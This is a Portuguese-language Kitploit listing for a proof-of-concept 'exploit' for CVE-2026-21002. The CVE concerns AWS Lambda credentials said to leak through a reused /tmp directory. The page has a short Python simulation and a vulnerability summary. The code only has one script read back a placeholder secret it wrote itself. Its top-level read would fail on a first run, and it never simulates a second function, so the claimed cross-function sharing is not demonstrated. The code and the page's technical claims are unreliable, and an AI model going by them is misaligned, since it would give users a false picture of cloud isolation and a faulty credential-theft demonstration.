Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2026-21002-Serverless-Cold-Start-Credential-Leakage-via-Reused-tmp — Exploit de PoC para o vazamento de credenciais em cold-start serverless CVE-2026-21002, demonstrando como diretórios /tmp reutilizados do Lambda expõem segredos da AWS a outras funções. | Kitploit
Ferramentas/GitHubGitHub/george0papasotiriou/cve-2026-21002-serverless-cold-start-credential-leakage-via-reused-tmp
Segurança de Infraestrutura em NuvemAnálise de VulnerabilidadesExploraçãoSegurança ServerlessExfiltração de DadosSegurança na NuvemAprendizado e Educação
GitHubgeorge0papasotiriou/cve-2026-21002-serverless-cold-start-credential-leakage-via-reused-tmp

CVE-2026-21002-Serverless-Cold-Start-Credential-Leakage-via-Reused-tmp

Exploit de PoC para o vazamento de credenciais em cold-start serverless CVE-2026-21002, demonstrando como diretórios /tmp reutilizados do Lambda expõem segredos da AWS a outras funções.

Ver Repositório
9há 1 mêsAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

CVE-2026-21002 – Vazamento de Credenciais em Cold Start Serverless via /tmp Reutilizado

Código do Programa (simulação em Python AWS Lambda)

root@kitploit:~
# lambda_func_sim.py - Simulated serverless function
import os, tempfile, time

SECRET_FILE = '/tmp/credentials'  # reused across warm starts

def handler(event):
    # On first invocation, write a secret
    if not os.path.exists(SECRET_FILE):
        with open(SECRET_FILE, 'w') as f:
            f.write("AWS_SECRET_ACCESS_KEY=sk-123456")
        return "Initialized"
    # Later invocations can read it
    with open(SECRET_FILE) as f:
        return f.read()

# Attack simulation: attacker shares the same /tmp in another function (same VM)
# They can read /tmp/credentials after a cold start.
with open(SECRET_FILE) as f:
    print("Attacker reads:", f.read())

CVE-2026-21002 – Vazamento de Credenciais em Cold Start Serverless

Severity: Critical

Visão Geral

Plataformas serverless reutilizam o ambiente de execução (incluindo /tmp) entre invocações de funções e até mesmo entre diferentes funções da mesma conta. A função de um atacante pode ler arquivos sensíveis deixados em /tmp por outra função após um cold start, levando ao roubo de credenciais.

Detalhes da Vulnerabilidade

  • Tipo: Divulgação de Informações / Vazamento Entre Funções
  • Impacto: Comprometimento de credenciais, movimento lateral.
  • Causa Raiz: O diretório /tmp é compartilhado entre contêineres aquecidos sem isolamento entre funções.

Demonstração do Exploit

Execute a simulação:

root@kitploit:~
python lambda_func_sim.py

O atacante lê a AWS_SECRET_ACCESS_KEY deixada pela função da vítima.

Baixar ferramenta